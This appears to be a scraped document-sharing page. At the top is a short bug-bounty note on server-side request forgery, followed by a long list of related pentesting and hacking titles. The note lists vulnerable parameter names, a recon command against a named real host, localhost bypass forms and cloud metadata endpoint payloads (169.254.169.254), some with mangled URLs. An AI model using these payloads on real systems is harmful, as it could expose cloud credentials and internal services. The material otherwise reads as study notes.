url=*.quizlet.com&output=text&fl=original&collapse=urlkey

======================

Backend

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

echo tomcat.tiler01.huygens.knaw.nl | gau | tee test-ssrf

127.0.0.1
127.0.1
127.1

0.0.0.0
0.0.0
0.0
0

[:]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++==

APIPA

Payloads
http://169.254.169.254/latest/
169.254.169.254/latest
https://169.254.169.254/latest/

Broken Authentication
No ratings yet
Broken Authentication
31 pages
Wireframe+Prototype+Template Tejasvi
No ratings yet
Wireframe+Prototype+Template Tejasvi
14 pages
m0chan Bug Bounty Cheatsheet
No ratings yet
m0chan Bug Bounty Cheatsheet
43 pages
eJPT Solution
No ratings yet
eJPT Solution
23 pages
Bug Bounty Course LEAK 2023
No ratings yet
Bug Bounty Course LEAK 2023
1 page
Bug Bounty Advanced Course
No ratings yet
Bug Bounty Advanced Course
3 pages
Lab Manual On Bug - Bounty
No ratings yet
Lab Manual On Bug - Bounty
30 pages
Bug Hunter Methodology V4 (@jhaddix) : Finding Seeds
0% (1)
Bug Hunter Methodology V4 (@jhaddix) : Finding Seeds
1 page
3. Attacking Authentication Mechanisms - @CyberFreeCourses
No ratings yet
3. Attacking Authentication Mechanisms - @CyberFreeCourses
78 pages
Nmap - Scanning The Internet
No ratings yet
Nmap - Scanning The Internet
45 pages
Bug Bounty Tips - Tricks
No ratings yet
Bug Bounty Tips - Tricks
101 pages
Ilovepdf Merged
No ratings yet
Ilovepdf Merged
26 pages
Bugcrowd Vulnerability Rating Taxonomy 1.10
No ratings yet
Bugcrowd Vulnerability Rating Taxonomy 1.10
14 pages
Zion: 1.1 Vulnhub Walkthrough: Penetration Testing Methodology
No ratings yet
Zion: 1.1 Vulnhub Walkthrough: Penetration Testing Methodology
15 pages
SSRF PPT (1)
No ratings yet
SSRF PPT (1)
8 pages
Levelup0X Bug Bounty Hunting Training
100% (2)
Levelup0X Bug Bounty Hunting Training
8 pages
Tomnomnom Recon
No ratings yet
Tomnomnom Recon
1 page
JWT Hacking
No ratings yet
JWT Hacking
8 pages
PentestTools NetworkVulnerabilityScan Report
No ratings yet
PentestTools NetworkVulnerabilityScan Report
6 pages
Forouzan6e ch10 PPTs Accessible
No ratings yet
Forouzan6e ch10 PPTs Accessible
214 pages
Black-Box Penetration Test 1
No ratings yet
Black-Box Penetration Test 1
29 pages
Udemy - Web Pentesting Course Slides
100% (1)
Udemy - Web Pentesting Course Slides
103 pages
Exploit Labs Short
No ratings yet
Exploit Labs Short
17 pages
Hackercool - Edition 7 Issue 02february 2024 - Hackercool
No ratings yet
Hackercool - Edition 7 Issue 02february 2024 - Hackercool
38 pages
Web Penetration Testing Roadmap (1)
No ratings yet
Web Penetration Testing Roadmap (1)
11 pages
PDF Jaeles-Introduction
No ratings yet
PDF Jaeles-Introduction
45 pages
Kumar 2017
No ratings yet
Kumar 2017
5 pages
Passive recon
No ratings yet
Passive recon
7 pages
Carcaboso. Albun Fotografíco
No ratings yet
Carcaboso. Albun Fotografíco
31 pages
F
No ratings yet
F
10 pages
BSCP Tracker
No ratings yet
BSCP Tracker
207 pages
HTTP Request Splitting
No ratings yet
HTTP Request Splitting
68 pages
Intro Rooms
No ratings yet
Intro Rooms
8 pages
Pentest-Report Mullvad v1
No ratings yet
Pentest-Report Mullvad v1
9 pages
Cross-Site Scripting PDF
No ratings yet
Cross-Site Scripting PDF
18 pages
Automation For Manual Bug Bounty Hunters
No ratings yet
Automation For Manual Bug Bounty Hunters
35 pages
Keyword
No ratings yet
Keyword
23 pages
Icmp DNS, High Priority, GGC Telkom, Sosmed, Browsing, Unpriority
0% (1)
Icmp DNS, High Priority, GGC Telkom, Sosmed, Browsing, Unpriority
6 pages
Altoro PDF
No ratings yet
Altoro PDF
101 pages
7.-NT208-Lecture7 - WebServer
No ratings yet
7.-NT208-Lecture7 - WebServer
30 pages
Bug Bounty
No ratings yet
Bug Bounty
7 pages
Cube B2bua
No ratings yet
Cube B2bua
161 pages
Cross Site Scripting - XSS
No ratings yet
Cross Site Scripting - XSS
6 pages
Burpsuite Basics
No ratings yet
Burpsuite Basics
2 pages
Ccure 9000 Istar Port
100% (1)
Ccure 9000 Istar Port
20 pages
The Osint Cyber War 2023-06-19
No ratings yet
The Osint Cyber War 2023-06-19
26 pages
Lesson 8 Anatomy of a Url
No ratings yet
Lesson 8 Anatomy of a Url
27 pages
Lecture 12 Malicious Software
No ratings yet
Lecture 12 Malicious Software
38 pages
ESET Windows Exploit
No ratings yet
ESET Windows Exploit
26 pages
Frida Tutorial 2 - HackTricks
No ratings yet
Frida Tutorial 2 - HackTricks
7 pages
Unit 7 Application Layer
No ratings yet
Unit 7 Application Layer
19 pages
gc_2024_12_09
No ratings yet
gc_2024_12_09
5 pages
PDF
No ratings yet
PDF
28 pages
GitHub - Bettercap:Bettercap: The Swiss Army Knife For 802.11, BLE and Ethernet Networks Reconnaissa
No ratings yet
GitHub - Bettercap:Bettercap: The Swiss Army Knife For 802.11, BLE and Ethernet Networks Reconnaissa
3 pages
Evading All Web-Application Firewalls Xss Filters: September 2015
No ratings yet
Evading All Web-Application Firewalls Xss Filters: September 2015
19 pages
AirLive RS-2500 - Dual WAN Security VPN Gateway - User's Manual
No ratings yet
AirLive RS-2500 - Dual WAN Security VPN Gateway - User's Manual
7 pages
Radare
No ratings yet
Radare
379 pages
Librewolf CFG
No ratings yet
Librewolf CFG
11 pages
CCNASv2 InstructorPPT CH3
No ratings yet
CCNASv2 InstructorPPT CH3
54 pages
Bug Bounty Programs For Cyber-Security
No ratings yet
Bug Bounty Programs For Cyber-Security
9 pages
HTTP Request Message Format
No ratings yet
HTTP Request Message Format
3 pages
Becke CH SFTP Server s0 0 v1 5 Overview
No ratings yet
Becke CH SFTP Server s0 0 v1 5 Overview
17 pages
1 Web App Hacking Password Reset Functionality m1 Slides
No ratings yet
1 Web App Hacking Password Reset Functionality m1 Slides
8 pages
Pipenv Documentation: Release 2018.11.27.dev0
No ratings yet
Pipenv Documentation: Release 2018.11.27.dev0
74 pages
Burp Suite Cheat Sheet by Codelivly
No ratings yet
Burp Suite Cheat Sheet by Codelivly
5 pages
DCNS Mid 2 SET-2
No ratings yet
DCNS Mid 2 SET-2
1 page
ULIP ACCS Integration Requirement
No ratings yet
ULIP ACCS Integration Requirement
13 pages
Fortigate 80C
No ratings yet
Fortigate 80C
66 pages
1739272690521
No ratings yet
1739272690521
5 pages
Cisco Call Manager Text File
No ratings yet
Cisco Call Manager Text File
46 pages
World Wide Web Architecture
No ratings yet
World Wide Web Architecture
14 pages
Automatic Xss Detection Using Google
No ratings yet
Automatic Xss Detection Using Google
10 pages
DNS Record Types
No ratings yet
DNS Record Types
14 pages
Censys Quick Start Reference Censys - Io
No ratings yet
Censys Quick Start Reference Censys - Io
1 page
147-Reddish HTB Official Writeup Tamarisk
No ratings yet
147-Reddish HTB Official Writeup Tamarisk
18 pages
Quick
No ratings yet
Quick
21 pages
Subdomain Enumeration Cheat Sheet: @yamakira
No ratings yet
Subdomain Enumeration Cheat Sheet: @yamakira
1 page
HPE Intelligent Management Center
No ratings yet
HPE Intelligent Management Center
1 page
Base Celular Topex PDF
No ratings yet
Base Celular Topex PDF
6 pages
DesignativeDave - Androrat GitHub
No ratings yet
DesignativeDave - Androrat GitHub
2 pages
How To Connect Elastix To Mypbx Via Sip Trunking en
No ratings yet
How To Connect Elastix To Mypbx Via Sip Trunking en
21 pages
Bug Bounty
No ratings yet
Bug Bounty
1 page
Cloudflare Overview - Speed & Security
No ratings yet
Cloudflare Overview - Speed & Security
2 pages
Forouzan Notes
No ratings yet
Forouzan Notes
19 pages
Operation Sheet 4.1 - Email Server
No ratings yet
Operation Sheet 4.1 - Email Server
24 pages
Bug Hunting
No ratings yet
Bug Hunting
2 pages
Citrix Secure Gateway Guide: SAP Education Business Support Walldorf, Januar 2009
No ratings yet
Citrix Secure Gateway Guide: SAP Education Business Support Walldorf, Januar 2009
11 pages
Nmap Cheat Sheet From Discovery To Exploits - Part 1 Introduction To Nmap
No ratings yet
Nmap Cheat Sheet From Discovery To Exploits - Part 1 Introduction To Nmap
19 pages
Trackpad Ver. 2.0 Class 4
From Everand
Trackpad Ver. 2.0 Class 4
Nidhi Arora
No ratings yet
How to a Developers Guide to 4k: Developer edition, #3
From Everand
How to a Developers Guide to 4k: Developer edition, #3
Xinc Cyberwizard
No ratings yet